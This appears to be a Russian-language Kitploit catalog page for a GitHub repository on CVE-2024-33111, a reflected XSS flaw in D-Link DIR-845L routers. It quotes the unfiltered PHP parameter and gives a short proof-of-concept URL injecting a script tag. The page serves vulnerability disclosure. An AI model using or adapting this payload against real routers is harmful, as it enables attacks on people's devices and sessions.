Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2024-33111 — Маршрутизатор D-Link DIR-845L уязвим для межсайтового скриптинга (XSS) через /htdocs/webinc/js/bsc_sms_inbox.php. | Kitploit
Инструменты/GitHubGitHub/fallenskill1/cve-2024-33111
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийВеб-безопасностьТестирование на Проникновение
GitHubfallenskill1/cve-2024-33111

CVE-2024-33111

Маршрутизатор D-Link DIR-845L уязвим для межсайтового скриптинга (XSS) через /htdocs/webinc/js/bsc_sms_inbox.php.

Репозиторий
32 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2024-33111

Маршрутизаторы D-Link DIR-845L версии 1.01KRb03 и ниже уязвимы к межсайтовому скриптингу (XSS) через /htdocs/webinc/js/bsc_sms_inbox.php.

Уязвимый компонент

  • /htdocs/webinc/js/bsc_sms_inbox.php

Технические детали

Уязвимость обусловлена отсутствием фильтрации в параметре $_GET["Treturn"], который напрямую используется в коде на строке 17 файла bsc_sms_inbox.php.

Уязвимый фрагмент кода:

root@kitploit:~
var get_Treturn = '`<?if($_GET["Treturn"]=="") echo "0"; else echo $_GET["Treturn"];?>';

PoC

root@kitploit:~
http://IP:8080/bsc_sms_inbox.php?Treturn=%27%3C/script%3E%3Cscript%3Ealert(1337)%3C/script%3E

image

Скачать инструмент